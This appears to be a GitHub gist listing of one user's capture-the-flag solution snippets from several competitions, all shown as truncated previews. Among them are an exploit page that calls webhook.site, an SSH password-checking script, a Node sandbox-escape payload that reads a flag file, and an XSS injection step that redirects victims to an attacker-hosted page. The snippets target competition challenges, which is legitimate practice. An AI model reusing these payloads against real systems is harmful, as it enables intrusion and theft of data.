Skip to content

Instantly share code, notes, and snippets.

View st98's full-sized avatar

st98 st98

102 followers · 51 following
View GitHub Profile
@st98
st98 / gist:1edae6909a60c7c05d7705dd3ec2e3b5
Last active July 7, 2022 12:38
No flag here 😀
@st98
st98 / exp.html
Created May 30, 2021 17:03
Pwn2Win CTF 2021 - Small Talk
<body>
<style>
iframe {
width: 300px;
height: 200px;
}
</style>
<img src="http://httpstat.us/200?sleep=100000">
<img src="https://webhook.site/...?start">
<script>
@st98
st98 / solve.py
Created April 10, 2021 17:03
Midnight Sun CTF 2021 Quals - fsociety
import paramiko
from pwn import *
context.log_level = 'error'
def check(password):
try:
conn = ssh(host='fsociety-04.play.midnightsunctf.se', port=2222, user='elliot', password=password)
conn.close()
return True
@st98
st98 / memo.txt
Last active April 8, 2021 11:54
ångstromCTF 2021 - CaaSio SE
$ nc misc.2021.chall.actf.co 21705
Welcome to CaaSio Snake Edition! Enter your calculation:
[a='(async()=>{try{await import("")}catch(e){e[c]',b='p=process;p.stdout.write(p.mainModule.require',c='constructo'+'r']&&{[(a+='[c](b)()}})()')]:123,[b+='("fs").readFileSync("./flag.txt"))']:123,[a[c][c](a)()]:123}
Result:
{
'(async()=>{try{await import("")}catch(e){e[c][c](b)()}})()': 123,
'p=process;p.stdout.write(p.mainModule.require("fs").readFileSync("./flag.txt"))': 123,
undefined: 123
}
Variables:
@st98
st98 / gen.php
Created March 21, 2021 19:21
for Securinets Quals 2k21 - w3f
<?php
// utils
function add(&$table, $k, $v) {
if (array_key_exists($k, $table) && strlen($v) >= strlen($table[$k])) {
return;
}
$table[$k] = $v;
}
@st98
st98 / keybase.md
Created March 17, 2021 19:12

Keybase proof

I hereby claim:

  • I am st98 on github.
  • I am st98_ (https://keybase.io/st98_) on keybase.
  • I have a public key ASDsxyTcYAMmG9Cz2btD-Gkhn_aVa7qjuN1GSJ8f9a8vvwo

To claim this, I am signing this object:

@st98
st98 / nekodesu.s
Last active March 17, 2021 19:13
DiceCTF 2021 - TI-1337 Plus CE
BITS 64
; ref: https://starfleetcadet75.github.io/posts/plaid-2020-golf-so/
ehdr: ; Elf64_Ehdr
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
times 8 db 0
dw 3 ; e_type
dw 0x3e ; e_machine
dd 1 ; e_version
@st98
st98 / server.js
Created November 26, 2020 17:19
Hack.lu CTF 2020 - FluxCloud DoH
const express = require('express');
const dnsPacket = require('dns-packet');
const app = express();
const port = 8000;
let len = 0x12;
app.get('/updateLength', (req, res) => {
len = parseInt(req.query.len, 10);
console.log('updated:', len);
@st98
st98 / README.md
Last active March 17, 2021 19:13
BingoCTF - guestbook

guestbook

  1. Generate payload with gen_payload.php
  2. Put exploit1.html, exploit2.html, and generated payload.bin on your Web server
  3. Post </textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
  4. Fix filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
  5. Post ````
@st98
st98 / gen.py
Last active April 8, 2021 11:55
SECCON 2020 Online CTF - WAFthrough
with open('index.cgi', 'rb') as f:
s = f.read()
table = {
0: ['$$-$$', '__'],
1: ['$$/$$', '___'],
2: ['$___+$___', '____'],
4: ['$____*$____', '_____'],
8: ['$_____*$____', '______'],
16: ['$______*$____', '_______'],